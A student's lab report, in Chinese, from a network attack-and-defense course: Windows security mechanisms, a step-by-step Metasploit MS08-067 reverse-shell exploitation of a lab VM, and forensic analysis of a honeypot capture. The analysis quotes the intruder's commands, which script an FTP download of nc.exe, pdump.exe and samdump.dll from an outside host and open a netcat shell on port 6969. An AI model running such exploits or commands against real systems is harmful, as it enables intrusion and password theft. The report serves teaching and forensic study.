20211911 2021-2022-2 《网络攻防实践》实践六报告

1.实践内容

Windows操作系统基本结构

（1）

windows系统的内核基本模块
Windows执行体
Windows内核体
设备驱动程序
硬件抽象层
Windows窗口与图形界面接口内核实现代码

（2）

Windows内核的核心机制
Windows进程和线程管理机制
Windows内存管理机制
Windows文件管理机制
Windows注册表管理机制
Windows的网络机制

（3）

Windows运行机制

Windows系统内核中的进程和线程管理机制：

Windows进程中包括虚拟内存地址描述符、系统资源句柄列表、安全访问令牌、记录了进程Id及其父进程ID等信息、并至少有一个线程执行线程。线程包括程序执行的上下文信息，同时和进程共享虚拟地址、资源列表、安全令牌。

Windows操作系统的安全体系机制

（1）Windows身份认证机制
Windows为每个用户和计算机设置账户进行管理，账户权限的根本作用是限制这些账户的运行程序对系统对象的访问（最高权限的本地Administration账户）
（2）Windows授权与访问控制机制
Windows的授权与访问控制机制是基于引用监控器模型，由内核中的SRM模块与用户态的LSASS服务共同来实施，由SRM作为安全主体访问对象资源时的中介，根据设定的访问控制列表进行授权访问。

（3） Windows安全审计机制
Windows的审计策略由系统管理员定义。LSASS服务用于保存审计策略，SRM安全引用控制器对对象访问和操作事件进行记录，EventLog服务将事件写入日志文件中。

Windows远程安全攻防技术

windows的远程攻击可以大致分为：远程口令猜测与破解攻击、攻击网络服务、攻击客户端和用户

2.实践过程

动手实践Metasploit windows attacker
任务：使用metasploit软件进行windows远程渗透统计实验
具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权

虚拟机	IP地址
kali	192.168.200.3
Windows 2kserver	192.168.200.8
1.在kali中输入指令msfconsole启动kali里面的msfconsole

2.输入指令search ms08_067查看漏洞ms08_067详细信息

3.输入指令use exploit/windows/smb/ms08_067_netapi使用该exploit

4.输入指令show payloads显示可攻击载荷

5.输入指令set PAYlOAD generic/shell_reverse_tcp或者set PAYlOAD 3设置攻击的载荷为tcp的反向连接

6.输入指令show options展示渗透攻击需要设置的参数

7.输入指令show targets展示可渗透攻击的靶机的操作系统及版本

8.输入指令set LHOST 192.168.200.3设置渗透攻击的主机是kali，输入set RHOST 192.168.200.8设置渗透攻击的Win2KServer_靶机IP

9.输入指令exploit开始渗透攻击。温馨提示：记得开启蜜罐网关

10.在靶机中输入指令ipconfig/all显示靶机的操作系统和IP配置

同时在kali输入指令ipconfig/all显示靶机的操作系统和IP配置，渗透攻击成功

同样在kali输入指令net user查看用户，显示kali主机和win 2kserver，渗透攻击成功

取证分析实践：解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么

（1）.攻击者使用了什么破解工具进行攻击
1.用wireshark打开snort-0204@0117.log

2.接下来设置限定条件为：ip.addr==172.16.1.106 and http。

3.然后就开始往下翻，编号为117的这一行发现有一些奇怪的路径。这个boot.ini是NT系统的启动文件。

4.在该data前面的..%c0AF..查阅资料后得知，这是"/"的Unicode编码，基本确定存在Unicode漏洞攻击。
Unicode漏洞是指在Unicode字符解码时，IIS 4.0/5.0存在一个安全漏洞，导致用户可以远程通过iis执行任意命令。
当用户用IIS打开文件时，如果该文件名包含Unicode字符，系统会对其进行解码。如果用户提供一些特殊的编码，将导致IIS错误地打开或者执行某些Web根目录以外的文件。

5.在140行然后有一个msadcs.dll文件，这是一个远程数据访问服务的文件，存在RDS漏洞，该漏洞可以导致攻击者远程执行用户系统的命令，并以设备用户的身份运行。

6.进行TCP流追踪，看到!ADM!ROX!YOUR!WORLD!

追踪数据流时发现!ADM!ROX!YOUR!WORLD!出现了很多次，查询可知这个来自一个名为msadc2.pl的攻击工具。根据教材内容，证实这是RDS漏洞攻击

（2）.攻击者如何使用这个破解工具进入并控制了系统？
1.之后出现了ftp的连接，目标IP为204.42.253.18。通过追踪TCP流发现，这个连接由于口令错误导致连接失败。说明这次攻击是一个失败的攻击。

2.追踪TCP流，可以看出：攻击者通过创建了ftpcom脚本，使用ftp连接www.nether.net，并以johna2k为用户haxedj00为密码下载 nc.exe、pdump.exe和samdump.dll。

3.可以发现这次的攻击不是RDS攻击，而是Unicode漏洞攻击。通过追踪TCP流，发现攻击者发送了以下指令：
copy C:\winnt\system32\cmd.exe cmd1.exe
cmd1.exe /c open 213.116.251.162 >ftpcom
cmd1.exe /c echo johna2k >>ftpcom
cmd1.exe /c echo haxedj00 >>ftpcom
cmd1.exe /c echo get nc.exe >>ftpcom
cmd1.exe /c echo get pdump.exe >>ftpcom
cmd1.exe /c echo get samdump.dll >>ftpcom
cmd1.exe /c echo quit >>ftpcom
4.、在下载完文件之后，查看到 1224 号数据包，攻击者执行了这样一条命令：cmd1.exe /c nc -l -p 6969 -e cmd1.exe。表示攻击者连接了6969端口，并且获得了访问权限，进入了交互式控制阶段：

（3）.攻击者获得系统访问权限后做了什么
1.我们用tcp.port == 6969筛选并追踪tcp流，我们可以看到攻击者修改各种文件，企图通过pdump、samdump、net命令、rdisk命令等方式提权为管理员，成功后还删除了ftpcom文件等痕迹。

2.在1361分组的数据流中，下图攻击者使用了SQl注入，在靶机系统目录下生成一个文件

3.在编号2339追踪http流，我们可以看到ADD，这意味着提升权限

4.攻击者放弃了pdump提取Administrator口令密文的企图。攻击者删除了samdump和pdump。

5.最后攻击者exit

（4）.我们如何防止这样的攻击
这场攻击主要是是针对RDS漏洞的攻击和针对Unicode漏洞的攻击，防范方法有：
1.用户及时从如下地址下载Microsoft提供的补丁：t.asp为IIS 4.0的补丁地址，.asp为IIS 5.0补丁地址
2.安装windows NT系统时不要使用默认WINNT路径，您可以改为其他的文件夹，如C:\mywindowsbule
3.使用 NTFS 文件系统，因为 FAT 几乎不提供安全功能

（5）.你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么
继续追踪TCP流，就可以在分组4351处看到下图，由此可以得知攻击者已经警觉他的目标是一台蜜罐主机

团队对抗实践：windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）

防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。
攻击方：
使用桥接模式，用己方kali攻击同学的Windows 2k server

在C盘创建text文件

可以查看同学Windows 2k server中的文件

防守方：
可以看到攻击机向靶机发了许多TCP协议包，可以读出攻击方的ip，端口号

攻击方的攻击指令